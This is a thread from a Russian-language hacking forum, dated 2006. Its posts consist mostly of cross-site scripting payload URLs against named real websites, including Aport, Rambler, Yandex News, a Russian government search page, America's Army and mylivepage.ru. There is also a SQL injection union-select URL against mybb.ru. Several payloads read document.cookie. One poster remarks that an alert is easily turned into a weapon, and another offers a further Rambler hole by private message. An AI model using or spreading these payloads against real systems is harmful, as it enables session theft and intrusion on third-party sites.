 |
|
14.01.2006, 21:58
|
|
Новичок
Регистрация: 28.12.2005
Сообщений: 27
С нами:
10719372
Репутация:
2
|
|
http://sm.aport.ru/scripts/template.dll?That=epte&r="><script>alert(/xss/)</script><h1>HMM на апорте
|
|
|
02.02.2006, 22:56
|
|
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
С нами:
10868923
Репутация:
48
|
|
http://www.interrus.ru/journal/bzn.php?interrus=business&page=comments?idea=%3Csc ript%3Ealert(/xss/)%3C/script%3E
|
|
|
|
15.02.2006, 03:29
|
|
Новичок
Регистрация: 05.10.2005
Сообщений: 3
С нами:
10840180
Репутация:
0
|
|
|
|
|
|
15.02.2006, 18:09
|
|
Новичок
Регистрация: 17.12.2005
Сообщений: 16
С нами:
10735560
Репутация:
1
|
|
pacimu vsegda alert ... vi ni mojete delat drugoy xss ?
|
|
|
|
16.02.2006, 06:40
|
|
Новичок
Регистрация: 05.10.2005
Сообщений: 3
С нами:
10840180
Репутация:
0
|
|
Если есть алерт, то знающему человеку не составит труда сделать из небольшой шутки грозное оружие...
|
|
|
|
16.02.2006, 20:59
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами:
11269766
Репутация:
345
|
|
например confirm() или что-то типо
if (confirm("You are stupid??????")) {
alert("Странно, щас проверим!"); }
else {
alert("Не ври мне!");
}
|
|
|
|
16.02.2006, 22:34
|
|
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами:
10925666
Репутация:
454
|
|
завалявшееся:
http://smi.rambler.ru/main.cgi?action=<script>alert(document.cookie)</script>
http://news.yandex.ru/yandsearch?cl4url=www.utro.ru/news/2005/11/12/494551.shtml&country=Russia&cat="><script>alert(do cument.cookie)</script>
http://www.government.gov.ru/search/search.html?query="><script>alert('VectorG')</script>&page=1&book=0&he_id=38&pres_he_id=38
http://www.americasarmy.com/includes/bumper.php?goto="><script>alert()</script>
ещё есть новая xss на рамблер.ру, кому надо пишите в ПМ
|
|
|
|
14.03.2006, 18:35
|
|
Познающий
Регистрация: 13.02.2006
Сообщений: 82
С нами:
10652006
Репутация:
37
|
|
Вот решил выложить пару XSS с mylivepage.ru.... Выкладываю без алерта и всегопрочего ... Может еще работают =)
/login?name=&password=&return_url=http://name_site.mylivepage.ru/forum/36/11/%D0%9A%D1%82%D0%BE%20%D0%B1%D1%8B%D0%BB%20%D1%83%2 0%D0%BC%D0%B5%D0%BD%D1%8F%20%D0%BD%D0%B0%20%D1%81% D0%B0%D0%B9%D1%82%D0%B5%3F%3F%3F&login=[код]
/link?message_logintype=anonymous&message_logintype =login&message_login=&message_password=&link_url_s ubject=http://&add_link_url_action=[код]
/login?name=&password=&return_url=http://site_name.mylivepage.ru/link/39/71&login=[код]
/counter?type=[код]
/wiki/22/15?message_logintype=anonymous&message_logintype=l ogin&message_login=&message_password=&message_subj ect=&message_subscribe=&message_add_action=Отп авить+комментарий&message_rows=[код]
/friend?page=[код]&act=idx&type=image
ну и может кому понадобится для хохмы... Так как она никакой ценности не имеет
http://mybb.ru/cat.php?cat=[код] |
|
|
|
14.03.2006, 19:01
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами:
11269766
Репутация:
345
|
|
Хрена себе не имеет
_http://mybb.ru/cat.php?cat=-1%20union%20select%201,2,3,4000000000000000000,5,6 ,7,8,9,10,11,12/*
|
|
|
|
14.03.2006, 19:07
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами:
10958786
Репутация:
1034
|
|
Сообщение от max_pain89
Хрена себе не имеет
_http://mybb.ru/cat.php?cat=-1%20union%20select%201,2,3,4000000000000000000,5,6 ,7,8,9,10,11,12/*
Прикольнодо чего разработчики докатились что у них= наоф сайте уже баги есть......
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
